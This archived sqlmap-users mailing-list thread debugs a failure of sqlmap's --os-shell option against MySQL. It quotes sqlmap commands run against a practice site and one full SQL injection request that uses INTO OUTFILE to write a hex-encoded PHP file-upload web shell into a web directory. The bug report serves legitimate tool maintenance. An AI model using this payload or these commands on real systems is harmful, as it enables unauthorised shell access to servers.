Re: [sqlmap-users] SQLmap --os-shell BUG
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] SQLmap --os-shell BUG
|
From: Miroslav S. <mir...@gm...> - 2015-07-04 23:47:48
|
Thank you for your report. Fixed with the latest revision ( https://github.com/sqlmapproject/sqlmap/issues/1290) Bye On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote: > With yours is not throwing the error, you can reproduce my case with the > owasppractice examples, I am attaching the source code here, you will need > to setup the DB. Once up and running try lesson03: > > sqlmap.py -u > http://OwaspPractice/injection/lessons/lesson03/index.php?code=N > --os-shel l--prefix "\")" -v3 > > it looks like the back-end DBMS is 'MySQL'. Do you want to skip test > payloads specific for other DBMSes? [Y/n] > Y > for the remaining tests, do you want to include all tests for 'MySQL' > extending provided level (1) and risk (1) values? [Y/n] > n > > And should get the same error handling issue. > > > > On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar < > mir...@gm...> wrote: > >> Something is really wrong happening here. One user is having the >> identical problem like you (AttributeError: 'NoneType' object has no >> attribute 'replace') and I am not able to reproduce. >> >> Can you please rerun your sqlmap version with " >> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get >> the same error? >> >> Bye >> >> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote: >> >>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled >>> exception error: >>> >>> ./sqlmap.py -u >>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N >>> --os-shell --prefix "\")" --flush-session -v3 >>> >>> /sqlmap'. If the exception persists, please open a new issue at ' >>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> text and any other information required to reproduce the bug. The >>> developers will try to reproduce the bug, fix it accordingly and get back >>> to you >>> sqlmap version: 1.0-dev-166dc98 >>> Python version: 2.7.3 >>> Operating system: posix >>> Command line: sqlmap.py -u >>> ********************************************************************* >>> --os-shell --prefix ") --flush-session -v3 >>> Technique: None >>> Back-end DBMS: MySQL (fingerprinted) >>> Traceback (most recent call last): >>> File "sqlmap.py", line 102, in main >>> start() >>> File "lib/controller/controller.py", line 514, in start >>> injection = checkSqlInjection(place, parameter, value) >>> File "lib/controller/checks.py", line 391, in checkSqlInjection >>> reqPayload = agent.payload(place, parameter, newValue=boundPayload, >>> where=where) >>> File "lib/core/agent.py", line 188, in payload >>> retVal = _(regex, "%s=%s" % (parameter, >>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) >>> AttributeError: 'NoneType' object has no attribute 'replace' >>> >>> >>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar < >>> mir...@gm...> wrote: >>> >>>> I believe that you are using an old revision. For a long time there is >>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap >>>> --version" is being used. >>>> >>>> Please update to the latest revision from the official github >>>> repository and rerun the sqlmap. >>>> >>>> Bye >>>> >>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote: >>>> >>>>> Thanks >>>>> >>>>> sqlmap --version >>>>> sqlmap/1.0-dev >>>>> >>>>> In the meantime I will patch procs/mysql/write_file_limit.sql >>>>> >>>>> >>>>> >>>>> >>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar < >>>>> mir...@gm...> wrote: >>>>> >>>>>> Which revision/version of sqlmap do you use? There has been a related >>>>>> patch a month ago. Will check tomorrow. >>>>>> >>>>>> Bye >>>>>> >>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote: >>>>>> >>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell >>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian) >>>>>>> >>>>>>> Description: >>>>>>> >>>>>>> A specific PAYLOAD (see below) used to upload a web shell will >>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every >>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and >>>>>>> therefore not able to upload the web shell. >>>>>>> >>>>>>> >>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+ >>>>>>> >>>>>>> By default, MySQL will throw an error if the file already exists: >>>>>>> >>>>>>> mysql> select 'ss' into outfile >>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php'; >>>>>>> ERROR 1086 (HY000): File >>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists >>>>>>> >>>>>>> Solution: >>>>>>> >>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least >>>>>>> when using the -os-shell option >>>>>>> 2. Fix the PAYLOAD causing problems. >>>>>>> >>>>>>> -- >>>>>>> DanUx >>>>>>> >>>>>>> >>>>>>> ------------------------------------------------------------------------------ >>>>>>> Don't Limit Your Business. Reach for the Cloud. >>>>>>> GigeNET's Cloud Solutions provide you with the tools and support that >>>>>>> you need to offload your IT needs and focus on growing your business. >>>>>>> Configured For All Businesses. Start Your Cloud Today. >>>>>>> https://www.gigenetcloud.com/ >>>>>>> _______________________________________________ >>>>>>> sqlmap-users mailing list >>>>>>> sql...@li... >>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>>>>>> >>>>>>> >>>>>> >>>>>> >>>>>> -- >>>>>> Miroslav Stampar >>>>>> http://about.me/stamparm >>>>>> >>>>> >>>>> >>>>> >>>>> -- >>>>> DanUx >>>>> >>>> >>>> >>>> >>>> -- >>>> Miroslav Stampar >>>> http://about.me/stamparm >>>> >>> >>> >>> >>> -- >>> DanUx >>> >> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > > > -- > DanUx > -- Miroslav Stampar http://about.me/stamparm |
